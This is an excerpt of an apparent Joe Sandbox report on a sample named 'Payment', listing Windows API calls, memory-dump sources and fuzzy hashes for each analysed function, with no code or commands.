                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00B2F3F7
                                                          • VariantClear.OLEAUT32(00000013), ref: 00B2F469
                                                          • VariantClear.OLEAUT32(00000000), ref: 00B2F4C4
                                                          • _memmove.LIBCMT ref: 00B2F4EE
                                                          • VariantClear.OLEAUT32(?), ref: 00B2F53B
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B2F569
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: f56e2660d2384d28d6b2a196f74d0a8eff36e0bcfdfdbc7843e75588606e4e59
                                                          • Instruction ID: e338612693a3f5812794b714700458bac877a0f0f36a391c605c2745049ba5a3
                                                          • Opcode Fuzzy Hash: f56e2660d2384d28d6b2a196f74d0a8eff36e0bcfdfdbc7843e75588606e4e59
                                                          • Instruction Fuzzy Hash: 965149B5A0021AEFCB14DF58D884AAAB7F8FF4C354B1585A9E959DB310D730E911CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B32747
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B32792
                                                          • IsMenu.USER32(00000000), ref: 00B327B2
                                                          • CreatePopupMenu.USER32 ref: 00B327E6
                                                          • GetMenuItemCount.USER32(000000FF), ref: 00B32844
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B32875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 655b376ae6427bb54eee982594ab1187f334a2bde56985c2c896a58a15195185
                                                          • Instruction ID: 79a5898ac94aba774e62c46984d620f5d3505d9462c45ce7e162d7beaf91e0ac
                                                          • Opcode Fuzzy Hash: 655b376ae6427bb54eee982594ab1187f334a2bde56985c2c896a58a15195185
                                                          • Instruction Fuzzy Hash: 3F519A70A0030AEBDF25CF68D988BAEBBF5EF44314F2042A9E8119B291E7709945CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AD179A
                                                          • GetWindowRect.USER32(?,?), ref: 00AD17FE
                                                          • ScreenToClient.USER32(?,?), ref: 00AD181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AD182C
                                                          • EndPaint.USER32(?,?), ref: 00AD1876
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 816e2526870b0dcdaef4c564d9b497c094d0401171e06e81e9dcdb65f4a7247a
                                                          • Instruction ID: 2b6b8ab10bdd5297f8d1c94247734e53ef076beb916a752f8880927a654319a8
                                                          • Opcode Fuzzy Hash: 816e2526870b0dcdaef4c564d9b497c094d0401171e06e81e9dcdb65f4a7247a
                                                          • Instruction Fuzzy Hash: 74418B71204301AFDB10DF25CC84FBA7BF8EB49724F1406AAF9A6872A1CB319845DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ShowWindow.USER32(00B967B0,00000000,01485E80,?,?,00B967B0,?,00B5B862,?,?), ref: 00B5B9CC
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00B5B9F0
                                                          • ShowWindow.USER32(00B967B0,00000000,01485E80,?,?,00B967B0,?,00B5B862,?,?), ref: 00B5BA50
                                                          • ShowWindow.USER32(00000000,00000004,?,00B5B862,?,?), ref: 00B5BA62
                                                          • EnableWindow.USER32(00000000,00000001), ref: 00B5BA86
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B5BAA9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: 42dc10083cb62d55c9333a0d142826e8a30dc682aadbf92c024c9bee7bc62c06
                                                          • Instruction ID: b7ccf8f7d2321ffc37d868ab594424c398703f546371a055c32f69a42fa647ba
                                                          • Opcode Fuzzy Hash: 42dc10083cb62d55c9333a0d142826e8a30dc682aadbf92c024c9bee7bc62c06
                                                          • Instruction Fuzzy Hash: AD413034600285AFDB26CF54C489FA57BE1FB05316F1842F9FE488F6A2CB31A849CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00B45134,?,?,00000000,00000001), ref: 00B473BF
                                                            • Part of subcall function 00B43C94: GetWindowRect.USER32(?,?), ref: 00B43CA7
                                                          • GetDesktopWindow.USER32 ref: 00B473E9
                                                          • GetWindowRect.USER32(00000000), ref: 00B473F0
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B47422
                                                            • Part of subcall function 00B354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B3555E
                                                          • GetCursorPos.USER32(?), ref: 00B4744E
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B474AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 4fc2763e89b67adf5d5b793a8edd90602bd8704575a65037ae0055276967660e
                                                          • Instruction ID: 711a18e2c25bba06574868c8422e98979662ade1ddfea0aeeca1fdb4bf9ecda6
                                                          • Opcode Fuzzy Hash: 4fc2763e89b67adf5d5b793a8edd90602bd8704575a65037ae0055276967660e
                                                          • Instruction Fuzzy Hash: 2731D572508316AFD720DF54D849FABBBE9FF88314F100959F58997291DB30EA48CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B285F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B28608
                                                            • Part of subcall function 00B285F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B28612
                                                            • Part of subcall function 00B285F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B28621
                                                            • Part of subcall function 00B285F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B28628
                                                            • Part of subcall function 00B285F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B2863E
                                                          • GetLengthSid.ADVAPI32(?,00000000,00B28977), ref: 00B28DAC
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B28DB8
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B28DBF
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B28DD8
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00B28977), ref: 00B28DEC
                                                          • HeapFree.KERNEL32(00000000), ref: 00B28DF3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: 05dc8959a540042b69fbbd49bd5fe807673ec48a31de57098d397fcd5c5e99c2
                                                          • Instruction ID: dab96a396a9c374acd37b9a634b327cd98f208fb0d7b54b1d065f347e1dd2753
                                                          • Opcode Fuzzy Hash: 05dc8959a540042b69fbbd49bd5fe807673ec48a31de57098d397fcd5c5e99c2
                                                          • Instruction Fuzzy Hash: A211E131502615FFDF109F64EC08BBEB7A9EF55356F1480ADE849A3250CF31A909CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B28B2A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00B28B31
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B28B40
                                                          • CloseHandle.KERNEL32(00000004), ref: 00B28B4B
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B28B7A
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B28B8E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 86d7f63f23f3747dd125c1c9921ec1e752dcee092a2e977dd4398c21089646ff
                                                          • Instruction ID: ac205bc83c8e42d9db4e2b97e5f0192ac560faddc7f5d28683db74dda1d1f687
                                                          • Opcode Fuzzy Hash: 86d7f63f23f3747dd125c1c9921ec1e752dcee092a2e977dd4398c21089646ff
                                                          • Instruction Fuzzy Hash: AA1130B250121EABDF018F94ED49FEE7BE9EF09305F0440A9FE04A2160CB769D61DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AD134D
                                                            • Part of subcall function 00AD12F3: SelectObject.GDI32(?,00000000), ref: 00AD135C
                                                            • Part of subcall function 00AD12F3: BeginPath.GDI32(?), ref: 00AD1373
                                                            • Part of subcall function 00AD12F3: SelectObject.GDI32(?,00000000), ref: 00AD139C
                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B5C1C4
                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00B5C1D8
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B5C1E6
                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00B5C1F6
                                                          • EndPath.GDI32(00000000), ref: 00B5C206
                                                          • StrokePath.GDI32(00000000), ref: 00B5C216
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                          • String ID:
                                                          • API String ID: 43455801-0
                                                          • Opcode ID: 375e84ebd6475b67d16454e99895c077dd2e00d1ae9c70211fb38a974a3ec5d1
                                                          • Instruction ID: 5e3ea7d8422e13223b805b9e5afac8e9a9791b763e89c483a89ad116f8991049
                                                          • Opcode Fuzzy Hash: 375e84ebd6475b67d16454e99895c077dd2e00d1ae9c70211fb38a974a3ec5d1
                                                          • Instruction Fuzzy Hash: 42111E7640024DBFDF129F90DC88FEA7FADEB04355F0480A2B918971A1DB729D55DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AF03D3
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AF03DB
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AF03E6
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AF03F1
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AF03F9
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AF0401
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 52b3d15654458a6a7384a0eb9db5664c6bdfefe397f9222fc4e9dab4658812d2
                                                          • Instruction ID: c68f5db086b649e29c88f8a55166a1ae65d55e27b7eaeb4f35c2e76190394b58
                                                          • Opcode Fuzzy Hash: 52b3d15654458a6a7384a0eb9db5664c6bdfefe397f9222fc4e9dab4658812d2
                                                          • Instruction Fuzzy Hash: 36016CB090175A7DE3009F5A8C85B52FFE8FF19354F00415BA15C47941C7F5A864CBE5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B3569B
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B356B1
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00B356C0
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B356CF
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B356D9
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B356E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: a12e4ef33d684d5cd462027ed1537dc21352d15b88708d554cc707daf475c2f6
                                                          • Instruction ID: 52400ff755fc2aa74a4b8c79f07b479a8423a3215876bfefd5e6f60c8f867db3
                                                          • Opcode Fuzzy Hash: a12e4ef33d684d5cd462027ed1537dc21352d15b88708d554cc707daf475c2f6
                                                          • Instruction Fuzzy Hash: 0FF01231141659BBE7215B929C0DFBBBB7CEBC6B12F0001A9FA04D20509AA11A01C6B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00B374E5
                                                          • EnterCriticalSection.KERNEL32(?,?,00AE1044,?,?), ref: 00B374F6
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00AE1044,?,?), ref: 00B37503
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AE1044,?,?), ref: 00B37510
                                                            • Part of subcall function 00B36ED7: CloseHandle.KERNEL32(00000000,?,00B3751D,?,00AE1044,?,?), ref: 00B36EE1
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B37523
                                                          • LeaveCriticalSection.KERNEL32(?,?,00AE1044,?,?), ref: 00B3752A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 5096b0c0753034d06380cbc253ad048e47d0c9b10bb4b0bfde4da211246a62ad
                                                          • Instruction ID: 9da6af0c52b3dd1e72dbe6513c828f83ceb59c77f5b20613a71d295d2eed2be8
                                                          • Opcode Fuzzy Hash: 5096b0c0753034d06380cbc253ad048e47d0c9b10bb4b0bfde4da211246a62ad
                                                          • Instruction Fuzzy Hash: 25F03ABA141713ABEB112B64EC8CBEBB76AEF45303F1105B1F202A24A0CFB65801CA50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B28E7F
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00B28E8B
                                                          • CloseHandle.KERNEL32(?), ref: 00B28E94
                                                          • CloseHandle.KERNEL32(?), ref: 00B28E9C
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00B28EA5
                                                          • HeapFree.KERNEL32(00000000), ref: 00B28EAC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 8cbf27de42f00a2f6f0d65497703c0bfcb92285f161b795be17e885ebfafb15f
                                                          • Instruction ID: f765d12f72109b67adfe70db2359d36a76d6242b742638e6b198cf939bb7d92f
                                                          • Opcode Fuzzy Hash: 8cbf27de42f00a2f6f0d65497703c0bfcb92285f161b795be17e885ebfafb15f
                                                          • Instruction Fuzzy Hash: 63E0C236004602FBDA012FE1EC0CA2AFB69FB89323B108270F22992470CF72A421DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00B48928
                                                          • CharUpperBuffW.USER32(?,?), ref: 00B48A37
                                                          • VariantClear.OLEAUT32(?), ref: 00B48BAF
                                                            • Part of subcall function 00B37804: VariantInit.OLEAUT32(00000000), ref: 00B37844
                                                            • Part of subcall function 00B37804: VariantCopy.OLEAUT32(00000000,?), ref: 00B3784D
                                                            • Part of subcall function 00B37804: VariantClear.OLEAUT32(00000000), ref: 00B37859
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: a3e69632cc3fd3f32332b4d92548b75cddd0e8cfaf6f77a8db03ce4568357e3b
                                                          • Instruction ID: 1773ed9ba077b01d6472377a54aa4131c5b3fa6f46163e09b5aa38f3380f7b13
                                                          • Opcode Fuzzy Hash: a3e69632cc3fd3f32332b4d92548b75cddd0e8cfaf6f77a8db03ce4568357e3b
                                                          • Instruction Fuzzy Hash: 70917B716087019FC710EF24C58496BBBF4EF88744F0489AEF89A8B361DB31EA45DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AEFEC6: _wcscpy.LIBCMT ref: 00AEFEE9
                                                          • _memset.LIBCMT ref: 00B33077
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B330A6
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B33159
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B33187
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 44f3b0eb681b0e7355c01dc34ae238e6119852324f0284b59fe4371b98912d2a
                                                          • Instruction ID: 341faf894aa34a05203335d04f810984e6f7231c8dd657ad9b91b30fbbe823f4
                                                          • Opcode Fuzzy Hash: 44f3b0eb681b0e7355c01dc34ae238e6119852324f0284b59fe4371b98912d2a
                                                          • Instruction Fuzzy Hash: 2751E6316083009FD7299F28D985B6BBBE4EF45B50F240AAEF885E3191DB74CE44C792
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
